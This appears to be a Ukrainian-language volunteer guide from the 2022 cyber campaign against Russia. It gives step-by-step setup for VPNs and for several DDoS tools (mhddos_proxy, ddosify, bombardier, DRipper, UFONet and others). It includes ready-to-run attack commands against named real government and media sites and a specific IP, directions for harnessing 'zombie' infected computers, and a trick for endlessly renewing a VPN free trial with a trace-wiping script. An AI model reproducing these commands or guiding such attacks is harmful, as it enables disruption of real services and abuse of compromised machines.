Слава Україні!

Русский военный корабль, иди на хуй!

VPN

Налаштування VPN - 6 способів

ВАЖЛИВО!

Перед тим, як починати будь-яку DDOS-атаку необхідно
під’єднати VPN, який потрібно буде періодично
змінювати!
• Не атакуйте поодинокі цілі, дивіться в Телеграмканалах, що атакують інші, та просто доєднуйтеся. Так у
нас більше шансів “покласти ворожі сайти спатки”.
• Слава Україні!
• Руский воєнний корабль, іді нах*й!

Зміст

1. Як під’єднати VPN?
2. Як перевірити, чи змінилася ваша IP-адреса

1. Як під’єднати VPN?

Найпростіше й найефективніше це користуватися готовими програмами,
які можна скачати на свій комп’ютер і за допомогою однієї кнопки змінити
своє розташування.

Якщо Ви знаєте інші способи зміни IP-адреси, або налаштування VPN, Ви
можете використовувати їх, усе ап ту ю.

Нижче наведено перелік таких програм і посилання на них.

Просто скачуєте, встановлюєте, вибираєте будь-яку країну (у деяких випадках доцільно використовувати IP-адреси Росії, у деяких навпаки
європейські, або американські IP, усе залежить від завдання).

Раджу скачувати по 2-3 програми. Бо буває, що одна із програм починає
підлагувати.

Увага! Раджу використовувати Hotspot Shield, як основну програму для
зміни вашої IP-адреси, зараз це найкращий вибір.

Програми для VPN

1. Hotspot Shield
Наразі для українців діє акція: Premium тариф протягом одного місяця.
Просто реєструєтеся й скачуєте програму. Якщо ж акція вже не дійсна, то
просто обираєте Premium тариф, оформляєте підписку на 1 місяць,
підключаєте віртуальну картку (можна із 0 балансом) і користуєтеся Premium
версією протягом 1 тижня. Потім не забудьте відключити картку, щоб не
списало кошти за підписку.

Плюси:
– Простий інтерфейс
– Є місяць Premium акаунту для
українців
– Є російські IP
– Не лагає

Мінуси:

2. F-Secure Freedome
Тут реєструємося й далі скачуємо програму Freedome. Зараз вона
доступна безкоштовно для українців протягом 30 днів

Плюси:
– Простий інтерфейс
– Не потрібно прив’язувати свою картку
– Не лагає

Мінуси:
– Немає російських IP

3. Urban VPN
Повністю безкоштовний. Варіант для тих, хто не хоче довго паритися із настройкою VPN.

Плюси:
– Простий інтерфейс
– Повністю безкоштовний
– Є російські IP

Мінуси:
– Може лагати
– Російські IP у більшості випадків не працюють

4. ClearVPN
Зробили промо для українців (SAVEUKRAINE) із піврічним безкоштовним доступом. Через це його почали використовувати більшість українців і він почав дуже сильно підвисати. Тому зараз раджу використовувати інші програми.

Плюси:
– Простий інтерфейс
– Є промокод

Мінуси:
– Може дуже сильно лагати
– Російські IP не працюють

5. Windscribe
Платний. І цим усе сказано. Можна знайти безкоштовні кращі альтернативи. Не рекомендую

Плюси:
– Простий інтерфейс

Мінуси:
– Платний
– Російські IP не працюють
– Може дуже сильно лагати

6. KeepSolid VPN Unlimited
Аналогічно до ClearVPN. Зробили промо для українців із підпискою на півроку, яке, на жаль, я зараз навіть не можу знайти (хто захоче використовувати цей VPN – нагуглите). Через це можливі сильні лаги. Зараз не рекомендую використовувати цю програму.

Плюси:
– Простий інтерфейс
– Є промокод

Мінуси:
– Немає російських IP
– Може дуже сильно лагати

2. Як перевірити, чи змінилася ваша IP-адреса

Важливо! Після того, як Ви встановите й запустите VPN, необхідно перевірити, чи дійно змінилася Ваша адреса (бувають випадки, що сервіс підлагує, або міняє адресу не на ту країну, що Ви обрали).

Ось посилання, де можна перевірити вашу теперішню локацію:
Ресурс 1
Ресурс 2
Ресурс 3

OpenVPN

Враховуючи велику кількість запитів стосовно побудови VPN-тунелів, наша команда підготувала невеличку покрокову інструкцію для користувачів Windows. Сподіваємось, вона вам стане в нагоді. Завантажити інструкцію PDF

Cyberghost (ТОПОВИЙ)

Нарешті ми знайшли найшвидші VPN, які не відключаються самі по собі

Сервіс доступний лише 24 години, але його можно нескінченно оновлювати (див. п. 1.4)

На початку треба зробити наступне:
Щоб не було зайвої спам реклами у браузері від цієї программ, робимо так:
Тоді закриваємо програму та відкриваємо Мой компьютер / Этот компьютер / Проводник:

У виділеному синім полі вписуємо наступне:
C:\Windows\System32\drivers\etc

та натискаємо Enter

Відкриваємо файл hosts → Открыть с помощью

Обираємо Блокнот:

Вписуємо у кінець файлу наступне:

0.0.0.0 advertiser.cyberghostvpn.com

Натискаємо Сохранить как:

Зберігаємо на Робочому столі:

Натискаємо Сохранить

Потім знаходимо його на Рочому столі та клікаємо правою кнопкою миші → Переименовать:

Переіменовуємо так, щоб не було приписки .txt

Натискаємо Enter

Буде ось таке повідомлення:

Натискаємо Да

Далі знову ж клікаємо по ньому правою кнопкою миші, та натискаємо Вырезать (він скопіюється у Буфер обміну та видалиться з Робочого стола

Далі знову йдемо сюди:

C:\Windows\System32\drivers\etc

Та натискаємо Ctrl+V:

Обираємо пункт “Заменить файл в папке назначения”

Буде ось таке повідомлення:

Натискаємо Продолжить

Все файл вставлено та збережено, тепер зайвої реклами не буде – можемо йти до наступних пунктів

1.1 Скачування програми

Йдемо саме по ось цьому посиланню, щоб встановити застосунок (інакше безкоштовну версію не отримати): https://download.cyberghostvpn.com/windows/webinstaller/8/WebInstaller.exe Зберігаємо та скачуємо файл:

Відкриваємо файл (натискаємо Да у питанні від Windows)

Приймаємо Условия использования:

Чекаємо поки завантажиться:

Натискаємо “Согласиться и продолжить”:

1.2 Створення безкоштовного акаунту

У вікні, що з’явилося створюємо новий акаунт “Нажмите сюда, чтобы создать”

З’явиться таке вікно:

Далі топаємо сюди: https://www.moakt.com , та створюємо тимчасову пошту (Вводимо бажану адресу (будь-яку) та тиснемо Создать)

Копіюємо створену адресу пошти(можна просто клацнути Копировать):

Та створюємо на неї акаунт(тиснемо Регистрация):

З’явиться наступне вікно:

Далі повертаємося на moakt -> Тиснемо Обновить Список

Відкриваємо повідомлення -> Виділяємо та копіюємо посилання (Ctrl+C) -> Вставляємо його у нове вікно браузера

З’явиться наступне вікно – значить все успішно:

Повертаємося до додатку Cyberghost та бачимо там наступне:

Тиснемо Запустить пробный период

1.3 НАЛАШТУВАННЯ ПРОГРАМИ / АКАУНТУ

Тиснемо на стрілочку, щоб відкрити усі налаштування

Далі тиснемо на Шестеренку:

VPN протокол:

Обираємо Wireguard, бо він найновіший та найшвидший:

Далі тиснемо на виділену іконку:

Далі тиснемо Все серверы та гортаємо вниз до Россия (і клацаємо на неї):

насправді тут можна підключится до будь-якої країни, бо для mhddos_proxy не важливо, яка країна – головне, щоб був великий та швидкий Інтернет-трафік (бо ваші провайдери вам не дадуть розігнатися нормально (будуть нулі))тому краще не сильно навантажуйте Росію тут, бо вона нам потрібна для тестів

Потім натискаємо на виділену червоним кнопку для підключення:

Вітаю, Ви підключилися до ІР рашистів:

Перші 2-3 хвилини швидкість буде не дуже, але потім ось так:

У мене в тарифі від провайдера заявлено 50 Мбит/с, тут відображає так

І вас не буде відключатися інтернет, і буде гнатися ДУЖЕ великий трафік (гарні показники BPS та PPS)

Приклад безлімітного підключення та трафік:

Дуже великий трафік (скрін ще старої версії програми)

Швидкість 95 Мбит/с, хоча у мене від провайдера 50 Мбит/с

1.4 Створення нового безкоштовного акаунту

Виходимо з акаунту у додатку Cyberghost:

1 спосіб

2 спосіб:

Видаляємо старий акаунт(щоб та сама пошта у майбутньому була знову доступна для створення) тут: https://my.cyberghostvpn.com/ru_RU/login

Тиснемо Удалить мой аккаунт:

На цьому етапі може бути ось така помилка:

Помилка

Якщо вона буде – то простой забийте на це та йдіть далі по інструкціі

Якщо такої помилки не буде, то вводьте у полі, що зв’явиться ваш ПАРОЛЬ (а не PUK) та тисніть Удалить … , чи що там будете

!!!!Далі йдемо за цим посиланням (завантаження файлу почнеться автоматично): https://github.com/alexnest-ua/cracks/archive/refs/heads/main.zip (це скрипт який почистить логи за Cyberghost`ом, щоб він не міг відслідкувати, що ви вже ним користуалися безкоштовно)!!!

Він завантажиться в Загрузки (Downloads)

 Далі розпаковуємо архів з одним файлом всередені папки (бажано на Робочий стіл, щоб потім не шукати довго)

Запускаємо сам файл, буде ось таке повідомлення (як і з будь-якою програмою, яку навіть ви самі напишите на скомпілюєте exe-шник)

Тиснемо Подробнее

Выполнить в любом случае

Все, він виконався за ~2 секунди – Можемо закривати (Тиснемо Enter або на хрестик)

Далі знову йдемо сюди: https://www.moakt.com/ru

Створюємо нову пошту:

Тиснемо Создать та копіюємо пошту:

Далі знову йдемо до нашого додатку Cyberghost:

Робимо новий акаунт:

Йдемо на нову створену пошту:

Тиснемо Обновить список та бачимо наступне повідомлення:

Відкриваємо повідомлення -> Виділяємо та копіюємо посилання (Ctrl+C) -> Вставляємо його у нове вікно браузера

Ще одну пробну версію розпочато:

Повертаємося до додатку Cyberghost та бачимо там наступне:

Тиснемо Запустить пробный период

ТА ДАЛІ ЙДЕМО ДО ПУНКТУ ВИЩЕ: 1.3НАЛАШТУВАННЯ ПРОГРАМИ / АКАУНТУ

DDos Tools

LOIC CyberPalyanitsya v.3.1

ПЕРЕД АТАКОЮ ОБОВЯЗКОВО ПОСТАВИТИ VPN (БАЖАНО RU/BY СЕРВЕРИ)

LOIC_v3.2_CYBERPALYANITSYA_9999_max_threads_Release_13032022 

1 Вводимо IP або посилання на ціль (з посту тг)

2 Нажимаємо “Прийняти”

3 Вибираємо метод та порт (з посту тг)

4 Вибираємо кількість потоків (98-9999(експерементуйте, 300-700-1000)

5 Почати атаку

  1. Cкачуємо програму

  2. Вставляємо айпі або посилання з останнього посту каналу : https://t.me/CyberPalyanitsa 

  3. Нажимаємо Прийняти

  4. Вказуємо порт та метод які також зазначена в пості.

  5. Вказуємо кількість потоків 99-9999 (в залежності від характеристик компа) зазвичай до 1000.

  6. Нажимаємо "почати атаку"

ДРАКОНЯЧИЙ СОФТ!

СКАЧАТИ ДРАКОНЯЧИЙ СОФТ (RavenDOS_29032022_Release)

  1. Розпаковуємо архів
  2. Включаємо програму

Скан портів (розвідка):

Аналітика по домену/айпі (розвідка): 

Основна інструкція:

mhddos_proxy

1. Встановлюємо Python версії 3.

Переходимо за посиланням
https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe
Має початись скачування файлу. Після завершення відкриваємо його

Обов’язково тикаємо галочку на Add Python 3.10 to PATH
І тільки після цього натискаємо Install Now
Опісля весь час тикаєте по замовчуванню далі /да

2. Встановлюємо Git

Переходимо по посиланню https://gitforwindows.org/ і нажимаємо Download
Відкриваємо скачаний файл.

Не змінюємо шлях для встановлення і тому подібне. Нижче представленні
скріншоти, щоб переконатися у правильно вибраних опцій

Немає разниці який editor ви виберете, все одно користуватися не будете

 ↑↑↑↑↑↑↑↑↑↑↑↑↑
Ось тут важливо, щоб гіт був доданий до PATH

Натискаємо Install

Знімає галочки і натискаємо Finish

3. Встановлення mhddor_proxy

Для початку відкриваємо консоль (cmd) з правами адміністратора, для цього
– Нажимаємо win+R  і вводимо cmd


– АБО натискаємо пуск і там відразу вводимо cmd

Тикаємо по
У режимі адміністратора
Має вилізти промпт, щодо чи дозволяти використання Windows command
processor . Тикаємо Так
Далі потрібно обрати папку куди будемо встановлювати mhddos_proxy.
Переходимо до неї за допомогою команди cd

Наприклад

cd C:\Users\

Можна обрати свою папку, це не обов’язково має бути C:\Users
Варто зауважити, що якщо у назві папки є пробіл, весь шлях потрібно взяти у
лапки

cd “C:\Users\Mike Wazowski”

Але краще просто не використовувати таку папку
Далі прописуємо

git clone https://github.com/porthole-ascend-cinnamon/mhddos_proxy

І чекаємо доки воно завершить процес (доки знову не напише C:\Users ну чи
яку папку ви там обрали)

Далі пишемо
cd mhddos_proxy

Після цього
python -m pip install -r requirements.txt
Мало почати завантажувати різні пакети

Якщо ж пише про якісь помилки з пайтоном. Потрібно спробувати ту ж
команду але з python3

python3 -m pip install -r requirements.txt
Ось і все. Тепер можна запускати атаку

4. Запускаємо атаку

Для запуску атаки потрібно находить в директорії (папці) mhddos_proxy у
консолі. Про те де ви знаходитесь, пише рядок, який не можна стерти на
початку.

Якщо ви тільки що встановили mhddos_proxy (тобто виконували попередні
пункти), то все нормально. Ви маєте бути там де потрібно
Надалі, при запуску консолі, не потрібно встановлювати ще раз усі програми
і проводити усі махінації, достатньо просто ввести

cd C:\Users\mhddos_proxy

Ну або ж шлях, який ви обрали для встановлення mhddos_proxy

Далі розкажу про те як запускати атаку, якщо ну зовсім далі буде не
зрозуміло, можна завжди користуватися наступною командою

python runner.py -t 4000 --rpc 2000 -c https://cyberarmy.com.ua/9a877f1880802def46a --debug

При успішній атаці ви побачите наступне

-t відповідає за потоки, по простому, як багато процесор віддасть ресурсів на
програму для дудосу. Параметр потрібно виставляти так. Щоб процесор не
висів весь час на 100% загруженості. 80% буде достатньо.
--rpc краще не трогати, і просто залишити на 2000
-c вказує на конфіг з цілями, тобто цілі беруться звідти. Посилання можна
відкрити в браузері і подивитись, що там за цілі. Також їх можна вказати
вручну через пробіл

--debug потрібен, щоб бачити логи, тобто чи успішно проходить атака. Як
альтернатива, можна використовувати --table

--vpn якщо бажаєте використовувати ВПН то потрібно дописати цей аргумент
у команду.

Щоб припинити атаку потрібно нажати ctrl+c
Для більш детальної документації можна перейти до репозиторію mhddos_proxy

5. Оновлення програми

Проводиться дуже легко. В консолі потрібно
знаходитись у директорії (папці) mhddos_proxy.
Щоб перейти у директорію, потрібно ввести
cd C:\Users\mhddos_proxy

Ну або ж шлях, який ви обрали для встановлення mhddos_proxy

Далі просто вводимо
git pull
і чекаємо
Після оновлення можна знову буде запускати атаку.

ddosify

Ефективний DDOS - "ddosify" Windows

Не забувайте про VPN, без нього працювати не лише небезпечно, але й не ефективно.

Що треба робити:

  • Переходимо за посиланням: https://github.com/ddosify/ddosify/releases Та обираємо свою платформу. У нашому випадку:
  • Після завантаження розпаковуємо архів:
  • Далі створюємо текстовий документ:
  • Відкриваємо і вставляємо наступне:

chcp 65001
ddosify -t https://www.rbc.ru/ -n 500000 -d 3600 -p HTTPS -m GET -l linear

!!!Там де: https://www.rbc.ru/ ЦЕ САЙТ, ЯКИЙ МИ БУДЕМО БОМБИТИ!!!
  • Зберігаємо файл:
  • Даємо зрозумілу назву, щоб не забути =) в кінці додаємо .bat та “Тип файлу: усі файли”
  • Натискаємо “зберегти”.
  • Запускаємо цей файл:
  • В нас все працює! =)
Щоб зупинити роботу, натисніть Ctr+С та введіть букву “Y” (від англійського – yes)” Також запам’ятайте 1 файл = 1 сайт, не треба один і той самий сайт запускати по декілька разів!

TERMINATOR 6 (ddosify на стероїдах)

Підготовка:

ЗВАНТАЖИТИ TERMINATOR 6
1. Кладемо теку TERMINATOR у корінь диску “D” або у корінь “C”
2. Всередині знаходимо файли T100.bat, TERM.bat, T800.bat (“D:\TERMINATOR\Copy to Windows directory\”) і копіюємо у теку C:\Windows (не лякайтесь, це просто для зручності – можна буде запускати через гарячі клавіші)

Застосування:
Варіант 1. (РЕКОМЕНДУЮ СПРОБУВАТИ!)
Тиснемо WIN+R, вписуємо:


T100 yandex.ru
або

TERM yandex.ru/%RANDOM%

Тиснемо: “ОК”.
або
T800 yandex.ru
замість “yandex.ru” – Наша ціль.
тиснемо: “ОК”.

Варіант 2. (РЕКОМЕНДУЮ СПРОБУВАТИ!)
Знаходимо у теці: TARGETS.txt (“D:\TERMINATOR\TARGETS.txt”), вписуємо адреси – це список, щоб лупасити одразу кілька цілей в один клік.
Двічі клікаємо: KILL-TARGETS.bat або KILL-TARGETS-R.bat (D:\TERMINATOR\) – воно запустить по вікну для кожної цілі зі списку.

Варіант 3. (може кому так зручніше)
Знаходимо у теці: KILL-ONE.bat (“D:\TERMINATOR\KILL-ONE.bat”), тицяємо правою кнопкою миші – змінити.
Замість “yandex.ru” вписуємо нашу ціль.
Можна копіювати та перейменовувати цей файл багато разів — це як заготовка для запуску атаки.

Опис:

  • TERMINATOR.exe – одна з версій DDoSify
  • TARGETS.txt – список цілей.
  • TERMINATE.bat – допоміжний файл.
  • TERMINATE-R.bat – допоміжний файл.
  • KILL-TARGETS.bat – запуск атаки по списку (атакує T100)
  • KILL-TARGETS-R.bat – запуск атаки по списку (атакує TERM)
  • KILL-ONE.bat – заготовка для правки (не обов’язковий, кому не треба – можна видалити)
  • T100.bat – запускаючий файл, щоб можна було викликати термінатора через “WIN+R”.
  • TERM.bat – запускаючий файл через “WIN+R”, а також, автоматично перезапускає атаки.
  • T800.bat – нерівномірна коротка атака підтримки що повторюється і рандомно флудить. (Найкраще гасить разом з T100)
  • HELP.txt – цей файл з описом використання.

ДОДАТКОВО:
—————————————————————
Інструкція до застосування для мультигравців:

1. Вмикаємо VPN;
2. Тицяємо “СТАРТ”, щоб розпочати гру;
3. У вікнах:

  • 🟢 зелений колір – це “здоров’я персонажу”, чим менше – тим більший дамадж;
  • 🔴 червоний – помилки, які персонаж шле у відповідь від запиту;
  • 🔵 синій – час відповіді від персонажа у секундах.

Закриваємо вікно якщо зелений та синій по нулях (це означає, що персонаж втратив здатність розмовляти та приліг відпочити). Якщо здоров’я 0, а синє – цифра, відмінне від нуля, то перс ще щось “вякає” у відповідь. Продовжуємо.

Таргет файл без зайвих букв, лише імена персонажів.

Kill-one – гра для сингл гравців. Просто тицяєш мишою – воно єбаше. ПКМ – змінити,
щоб записати ім’я іншого персонажа у лапках, і в бій.

Docker Alpine/Bombardier

  1. Перейдіть на сайт https://www.docker.com/products/docker-desktop
  2.  Натисніть:

  1. Запускаємо завантажений файл «Docker Desktop Installer» 
  2. У випадку попередження від системи тиснемо «Виконати» 

5. Залишаємо відміченні прапорці для встановлення потрібних доповнень і тиснемо «ОК»

  1. Чекаємо встановлення всіх пакетів даних (може трошки довго все йти).  
  2. Після завершення встановлення погоджуємось з перезавантаженням ПК (тиснемо синю  кнопочку):

8. Коли ваш комп’ютер перезавантажився запускаємо програму

9. У вікні, що з’явилось встановлюємо прапорець «I accept the terms» і тиснемо синю клавішу  «Accept»

  1. Далі потрібно довстановити пакет оновлень для ядра Linux. Щоб ці файли доставити тисніть  на посилання вікна, що з’явилось (це вікно не закриваємо): 

Або за посиланням – https://docs.microsoft.com/ru-ru/windows/wsl/install-manual#step-4—download the-linux-kernel-update-package

І тиснемо на посилання для скачування пакету оновлень: 

  1. Після завантаження запускаємо файл «wsl_update_x64.msi» 
  2. Встановлюємо оновлення (NEXT та далі FINISH): 

13. Тиснемо клавішу RESTAR

14. Очікуємо запуску Docker

15. Після пропускаємо інформацію про особливості роботи програми. Клавіша “Skip tutorial”

  1. Далі запускаємо командний рядок. Тиснемо на клавіатурі клавіші Windows+R та прописуємо  “cmd”. Щоб здійснювати атаку на декілька сайтів можна запускати декілька таких терміналів  повторюючи крок 16

17. У вікні терміналу прописуємо команду:

docker run -ti --rm alpine/bombardier -c 1000 -d 3600s -l  https://www.gosuslugi.ru


Ось та виглядатиме заспамлення сайтів окупантів:

В кінці посилання на ЦІЛЬ. Таких терміналів може бути декілька і в кожному можна прописувати різні  урядові сайти. Наприклад:
docker run -ti --rm alpine/bombardier -c 1000 -d 3600s -l https://mil.ru

docker run -ti --rm alpine/bombardier -c 1000 -d 3600s -l https://scrf.gov.ru

docker run -ti --rm alpine/bombardier -c 1000 -d 3600s -l https://ach.gov.ru

docker run -ti --rm alpine/bombardier -c 1000 -d 3600s -l https://epp.genproc.gov.ru

docker run -ti --rm alpine/bombardier -c 1000 -d 3600s -l https://www.gosuslugi.ru

docker run -ti --rm alpine/bombardier -c 1000 -d 3600s -l https://rkn.gov.ru

docker run -ti --rm alpine/bombardier -c 1000 -d 3600s -l http://kremlin.ru

docker run -ti --rm alpine/bombardier -c 1000 -d 3600s -l http://government.ru

docker run -ti --rm alpine/bombardier -c 1000 -d 3600s -l http://duma.gov.ru

docker run -ti --rm alpine/bombardier -c 1000 -d 3600s -l http://council.gov.ru

По завершенню циклу атаки, яка триває 1 година (коли з’явиться повідомлення Done та як  провантажиться інформація про атаку) тиснете стрілочкою вгору і команда, яка перед цим була  виконана знову пропишеться в рядку. Після цього тиснемо Enter та все буде повторюватись.  

Щоб ваші зусилля не були марними використовуйте також VPN. Кожен адміністратор сайту може  ознайомитись з потоком вхідних IP адрес і просто заборонити використовувати свій сайт жителям  України. VPN потрібний, щоб закосити під своїх і підключитись з росії чи білорусії (навмисне з  маленької бо не заслуговують вони такої честі).  

DRipper

Важливий момент! Кожен учасник любої команди повинен використовувати VPN. Саме він зможе збільшити вашу анонімність в інтернет-просторі та надасть змогу легко і без проблем працювати над захистом України в кібервійні. Для атак на сайти рекомендуємо використовувати російські або білоруські айпі адреси. РФ може обмежити світ від сайту, але своїх громадян вона обмежити не зможе :)

DRipper

Потрібен встановлений Python3 та pip3.

1. Запускаємо CMD або Windows PowerShell.

2. Вводимо наступні команди:

git clone https://github.com/nanabanano/runner.git
cd runner
pip3 install pyinstaller
pip3 install -r requirements.txt

3. Вводимо команду (для Windows)

pyinstaller app.py --collect-all dns --add-data="headers.txt:." --add-data="DRipper.py:." --onefile

4. Вводимо команду (для Mac)

pyinstaller --collect-all dns --add-data "headers.txt;." --add-data "DRipper.py;." --onefile app.py

5. Вводимо наступну команду:

python3 DRipper.py -s [SERVER IP] -p [PORT]

SERVER IP – айпі адреса відповідного сайту.

PORT – порт сервера.

Ripper

  1. Інструкція для Windows!

Нижче інструкції, під кожною з яких картинка-пояснення. Картинок багато, але все ІЗІ

  1. Звантажити “Python”. Для цього перейти за посиланням:

https://www.python.org/

і натиснути “Downloads”.

Потім натиснути велику жовту кнопку “Download Python”

І натиснути “Зберегти”

2. Встановити “Python”.

Для цього перейти у провідник Windows (файловий менеджер), у теку “Завантаження”, запустити завантажений файл:

Далі, встановити галочку “Add Python 3.10 to PATH” (як на картинці) і натиснути “Install NOW”

3. Звантажити “DDoS-Ripper”. Для цього, перейти за посиланням: https://github.com/palahsu/DDoS-Ripper

Натиснути “Code”, і потім: “Download ZIP”

Зберегти та розархівувати (для цього натиснути правою кнопкою миші по архіву -> обрати “Видобути все -> Видобути”)

4. У консолі запустити скрипт типу:

python DRipper.py -s {IP або сайт} -p {Порт} -t 135 -q 10000

Нижче більш детальне пояснення:

Після останнього кроку вінда автоматично відкриє вікно DDoS-Ripper-main, треба

Відкрити внутрішню теку.

А після її відкриття натиснути правою кнопкою будь-де на екрані та обрати “Open in Windows Terminal”

Повинно з’явитись наступне вікно:

Далі вводимо команду типу:

python DRipper.py -s {IP або сайт} -p {Порт} -t 135 -q 10000

Як її правильно ввести, розберемося на практичному прикладі. Ви бачите:

Відповідно, вираз {IP або сайт}  треба замінити на  95.167.23.6,

а {Порт} на 80

Тобто необхідна команда виглядатиме так (зручно спочатку її надрукувати, наприклад у Блокноті, або собі у особистому повідомленні в “Телеграм”, а потім скопіювати).

python DRipper.py -s 95.167.23.6 -p 80 -t 135 -q 10000

Копіюємо та вставляємо “Ctrl+SHIFT+V” у термінал та натискаємо “Enter”

Кінцевий результат:

Після натискання “Enter” бачимо:

Якщо все так, то усе зроблено правильно!

DDoZ-em

DDoZ-em (DDoS Them)

1. Що потрібно?

Пакети, python3, git, pip’и, argparse, socket, pythonping, проксі(але тільки для HTTP і HTTPS.
Проксі можна взяти тут:  https://t.me/proxy_list_misha

Автоматичне завантаження потрібних пакетів: ./setup.sh

2. Завантажуємо:

Bash і ZSH (Windows, Linux, MacOS, Android):
git clone https://github.com/RiXxUkr/DDoZ-em
cd DDoZ-em

3. Як користуватися? (Приклад)

Для HTTP/HTTPS: python3 http_s.py -t gov.ru -i 123.213.231.0 -p 80 -w 500
Для TCP: python3 tcp.py -i 222.111.231.0 -p 21 -w 499
Для UDP: python3 udp.py -i 111.222.132.1 -p 82 -w 501

Сканування портів: Port Scanner: python3 port\ scanner.py

Список портів тут.

Функціонал (дуже великий):

~ DDoS всіма способами (HTTP/HTTPS/TCP/UDP)

~ DDoS HTTP/S з проксі

~ DDoS HTTP/S з обранням сторінки

~ DDoS TCP/UDP IP з портом

~ Візуальний сканнер портів

HTTP/S (DDoS’ить всі порти):

-t – Ціль (сайт)

-i – IP проксі

-p – Порт проксі

-f – Ціль сторінки (пропускаєте цей пункт, ставте його завжди)

-w – Кількість потоків

Необов’язкові пункти: f, w

TCP (DDoS’ить обраний порт):

-i – IP цілі

-p – Порт цілі

-w – Кількість потоків

Всі пункти обов’язкові окрім “w”.

UDP (DDoS’ить обраний порт):

-i – IP цілі

-p – Порт цілі

-w – Кількість потоків

Усі пункти обов’язкові окрім “w”.

UFONet

Зараз будемо вчитися як фігачити россійські сайти.
ufonet.03c8.net - СОФТ
https://github.com/epsylon/ufonet

git clone https://github.com/epsylon/ufonet

^^^^^^^^^^^^^ 
Читайте і встановлюйте за інструкцією (Вам потрібний Python3)
Встановили? Добре.
Відкриваємо папку з софтом в терміналі. (ufonet)
Перша команда:

python ufonet --help

Якщо помилка, то можливо не встановлені пакети. Пиши: python setup.py install (треба бути в теці з софтом у терміналі.)
Друга команда:

python ufonet --download-zombies --force-yes

Як ви вже могли здогадатися, команда “Встановлює Зомбі”. Зомбі – це інфіковані комп’ютери які використовуються для ДДОСа вони нам поможуть зносити сайти.
Базові команди:

1. python ufonet --gui

(Зробить інтерфейс відвідати його можна через браузер за посиланням: localhost:9999)

2. python ufonet --examples

(Дає список прикладів атак оберіть одну і фігачте або зробіть свою.)

3. python ufonet --auto-search

(Пошук нових “Зомбі” використовує пошукові сервіси “Yahoo, Bing, DuckDuckGo”)
Більше не означає краще! Один термінал, а цілі вистачає.

Для ефекту потрібно ДДОСити довго 30-120 хвилин.

Сам софт – це не лише ДДОСер, а й мережа в якій ти можеш ділитися “Зомбі”, разом атакувати сайти та спілкуватися в форумі.
Поки що це все. Нехай щастить! А москалям: Нехуй шастать! 😈

DDoS-master

Які вимоги?
~ Пакети
=- python3
=- git
~ pip’и
=- argparse
=- socket
=- pythonping
~ проксі

Як встановити?

~Bash й ZSH (Windows, Linux, MacOS, Android):
sudo apt-get install git
git clone https://github.com/RiXxUkr/DDoS-master.git
cd DDoS-master/
./setup.sh

Як використовувати?

HTTP:
python3 http_s.py -t rusvoenkoridina.h -i 123.213.231.0 -p 80 -w 501 -s 51
python3 http_s.py -t 132.231.213.0 -i 123.213.231.0 -p 80 -f /dorime -w 499 -s 49
python3 http_s.py -t 132.231.213.0 -i 123.145.167.8 -p 666 -f /subscribetoRiXandme -w 500
HTTPS:
python3 http_s.py -t rusvoenkoridina.h -i 123.213.231.0 -p 80 -w 501 -s 51
python3 http_s.py -t 132.231.213.0 -i 123.213.231.0 -p 80 -f /dorime -w 499 -s 49
python3 http_s.py -t 132.231.213.0 -i 123.145.167.8 -p 666 -f /subscribetoRiXandme -w 500
TCP:
python3 tcp.py -i rusvoenkoridina.h -p 22 -w 501
python3 tcp.py -i 132.231.213.0 -p 51 -w 499
python3 tcp.py -i 132.231.213.0 -p 53421
UDP:
python3 udp.py -i rusvoenkoridina.h -p 22 -w 501
python3 udp.py -i 132.231.213.0 -p 51
python3 udp.py -i 132.231.213.0

Функціонал:

~ DDoS методами (HTTP/HTTPS/TCP/UDP)
~ DDoS HTTP/S з проксі
~ DDoS HTTP/S з вибором сторінки
~ DDoS TCP/UDP з вибором порту
~ Візуальний сканер портів

HTTP/S:

-t <Ціль (домен чи IP адреса)> (обов’язково)
-i (обов’язково)
-p <Порт проксі сервера> (обов’язково)
-f <Адреса сторінки сайту> (не обов’язково) (стандартно – автоматичний перебір)
-w <Кількість імітованих ботів> (не обов’язково) (стандартно – 100)
-s <Швидкість підключення імітованих ботів до проксі серверу та сайту у мілісекундах> (не обов’язково) (стандартно – 50)

TCP:

-i <Ціль (домейн чи IP адреса)> (обов’язково)
-p <Порт> (обов’язково)
-w <Кількість імітованних ботів> (не обов’язково) (стандартно – 100)

UDP:

-i <Ціль (домен чи IP адреса)> (обов’язково)
-p <Порт> (не обов’язково) (стандартно – автоматичний перебір)
-w <Кількість імітованих ботів> (не обов’язково) (стандартно – 100)

Інша версія цієї ж інструкції:

Українська мова
├─►Встановлення
│ ├─►Windows
│ │ └─►Скачати та розпаковати архів з назвою 'DDoS-master.zip'
│ │   └─►Запустити файл з назвою 'setup.bat' який лежить у папці, та слідкувати подальшим інструкціям
│ └─►Інші
│   └─►Відкрити термінал
│     └─►Ввести команди
│       ├─►sudo apt-get install git
│       ├─►git clone https://github.com/RiXxUkr/DDoS-master.git
│       ├─►cd DDoS-master/
│       └─►bash setup.sh
├─►Вимоги (встановлюються автоматично при встановленні, на пункт вище)
│ └─►python 3
│   └─►pythonping
├─►Функціонал
│ ├─►Сканування відкритих портів (GUI)
│ ├─►Методи
│ │ ├─►HTTP(s)
│ │ ├─►TCP
│ │ └─►UDP
│ └─►Особливості
│   ├─►Оптимізація
│   └─►HTTP(s) метод через проксі сервер
├─►Використання
│ └─►Скрипти
│   ├─►Windows
│   │ └─►py <Назва скрипта.py> --help
│   ├─►Інші
│   │ └─►python3 <Назва скрипта.py> --help
│   ├─►http_s.py
│   │ ├─►-t <Ціль (домейн чи IP адреса)> (обов'язково)
│   │ ├─►-i  (обов'язково)
│   │ ├─►-p <Порт проксі сервера> (обов'язково)
│   │ ├─►-f <Адреса сторінки сайту> (не обов'язково)
│   │ │ ├─►Якщо не вказувати - кожен запит буде на випадкову сторінку (для більшої ефективності)
│   │ │ └─►Приклад
│   │ │   ├─►www.site.com/page
│   │ │   └─►-f /page (вказувати існуючу та найбільшу сторінку щоб було ефективніше)
│   │ ├─►-w <Кількість імітованних ботів> (не обов'язково)
│   │ │ ├─►Якщо не вказувати - автоматично ставиться на 100
│   │ │ └─►Приклад
│   │ │   └─►-w 500 (чим більше - тим більша нагрузка на комп'ютер та інтернет)
│   │ ├─►-s <Швидкість підключення імітованнх ботів до проксі серверу та сайту у мілісекундах> (не обов'язково)
│   │ │ ├─►Якщо не вказувати - автоматично ставиться на 50
│   │ │ └─►Приклад
│   │ │   └─►-s 100 (чим більше - тим більша затримка підключення імітованнх ботів)
│   │ └─►Приклад використання
│   │   ├─►Windows
